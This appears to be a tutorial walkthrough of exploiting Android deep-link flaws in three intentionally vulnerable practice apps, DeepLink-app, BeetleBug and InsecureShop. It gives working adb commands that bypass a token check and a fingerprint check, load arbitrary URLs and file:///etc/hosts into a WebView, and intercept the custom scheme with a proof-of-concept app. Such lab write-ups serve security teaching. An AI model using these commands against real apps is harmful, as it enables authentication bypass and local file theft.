Android Deep Links exploit with 3 apps

Deep links types

There are 3 types of deep links and they are summarized in this picture

As you can see, it is like a hierarchy, each type is a special case from the previous type. We will explain each one briefly.

1. Deep links

It handles URIs in the form of scheme://authority/path the scheme can be a standard scheme like http,https or a custom one like app:// the authority should have a domain structure to make ownership of the link clear. Finally /path which is used to send the user to a particular activity based on your app logic.

2. Web links

From its name, this is the URL that we already know, most web links are considered deep links. It handles URIs with the http/https schemes only.

3. Android app links

Android App Links is a special type of deep link that allows website URLs to immediately open the corresponding content in an app. Must have the autoVerify attribute set to true.

Important

If you’re having android version >=12 and higher, those web links doesn’t work anymoer ,So the browser will automatically take over the handling of this intent

Exploitation

We will try to exploit and show a demo of three intentionally vulnerable apps

===============================================================

App 1

DeepLin-app

To download the app here

We need to decompile the app with tools like Jadx.

After that, open the `AndroidManifest.xml` in Jadx .

Then looking in `AndroidManifest.xml`i found this

Thet means the app vulnerable to `DeepLink`

As you can see, we have one hit. The `DeppLink` defines an intent filter that uses the deep link.

So,let us go to that activity and see how the deep links is handled

The remaining code basically checks if the provided URL has `holiday://` and it checks if there’s a query parameter `token` ,and check if value equlas `2100537c6456cd8a437f7734fad189a8`

We can exploit it with `adb` and Creat appPoc

1- Will exploit it with `create appPoc ` :

1. We to add in `MainActivity.java`

Uri deepLinkURL = getIntent().getData(); 
  System.out.println("Credentials: " + deepLinkURL.toString());

2. And in `AndroidManifest.xml` add

<intent-filter> 
  <action android:name="android.intent.action.VIEW"></action> 
  <category android:name="android.intent.category.BROWSABLE"></ category> 
  <category android:name="android.intent.category.DEFAULT"></category> 
  <data android:scheme="holiday"></data> 
</intent-filter>

2- exploit it with `adb` :

am start -a android.intent.action.VIEW -d "holiday://whatever.login/test?token=2100537c6456cd8a437f7734fda189a8"

`-a` option is used to specify the action, `-d` is for the data passed to that action.

===============================================================

App 2

BeetleBug

To download the app here

Wee decompile the app with tools like Jadx.

After that, open the `AndroidManifest.xml` in Jadx .

Then looking in `AndroidManifest.xml`

As we can see ,we have DeeplinkAccountActivity defines an intent filter that uses the Deep link account `https://bettlebug.com/account`

Duplo click in DeeplinkAccountActivity to go that activity

So, let us go to that activity and see how the deep link is handled

The code here is simple, if the deep link is triggered, we bypass the fingerprint validation and go straight to the account page to get the flag. So, let’s use the deep link while having the fingerprint activity running.

exploit it with `adb`

adb shell am start -a android.intent.action.VIEW -d "https://beetlebug
.com/account"

-a option is used to specify the action, -d is for the data passed to that action.

BooooOOOoom

===============================================================

App 3

InsecureShop

To download the app here

Wee decompile the app with tools like Jadx.

After that, open the `AndroidManifest.xml` in Jadx .

Then looking in `AndroidManifest.xml`i found this

As you can see, we have one hit. The WebViewActivity defines an intent filter that uses the deep link `insecureshop://com.insecureshop `

So, let us go to that activity and see how the deep link is handled.

In this code snippet, the developer defines a WebView component with some settings set to true. We are interested in 2 of them, setJavaScriptEnapled this lead to enables us to run javascript on the WebView. setAllowUniversalAccessFromFileURLs allows us to use the file:// protocol to read files on the system. like /etc/hosts and etc..

The remaining code basically checks if the provided URL has `/web` or `/webview` path in it and if it does have either, it then checks if there’s a query parameter `url` and then `webview.loadUrl` loads the given URL.

So in short, there is on sanitization of the URL provided using the deep link so we can open arbitrary websites we control and run `adb`

adb shell am start -a android.intent.action.VIEW -d 'insecureshop://com.insecureshop/web?url=http://sisix0.com'

-a option is used to specify the action, -d is for the data passed to that action.

Here we loaded arbitrary URLs into the webview.

To used file:// protocol to read files on the system

adb shell am start -a android.intent.action.VIEW -d 'insecureshop://com.insecureshop/web?url=file:///etc/hosts'

and we can get xxs